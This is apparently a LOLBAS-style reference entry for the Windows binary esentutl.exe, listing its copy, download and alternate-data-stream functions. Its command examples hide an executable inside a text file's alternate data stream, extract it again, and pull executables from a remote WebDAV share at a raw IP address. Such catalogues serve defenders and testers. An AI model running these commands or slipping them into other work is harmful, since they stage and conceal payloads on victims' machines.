39 lines
798 B
Markdown
39 lines
798 B
Markdown
|
## Esentutl.exe
|
||
|
|
||
|
* Functions: Copy, Download, Write ADS, Read ADS
|
||
|
|
||
|
```
|
||
|
esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
|
||
|
|
||
|
esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
|
||
|
|
||
|
esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
|
||
|
|
||
|
esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
|
||
|
|
||
|
esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o
|
||
|
|
||
|
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
|
||
|
```
|
||
|
|
||
|
Acknowledgements:
|
||
|
* egre55 - @egre55
|
||
|
|
||
|
Code sample:
|
||
|
*
|
||
|
|
||
|
Resources:
|
||
|
* https://twitter.com/egre55/status/985994639202283520
|
||
|
|
||
|
Full path:
|
||
|
```
|
||
|
c:\windows\system32\esentutl.exe
|
||
|
c:\windows\sysWOW64\esentutl.exe
|
||
|
```
|
||
|
|
||
|
Notes:
|
||
|
|
||
|
|
||
|
|
||
|
|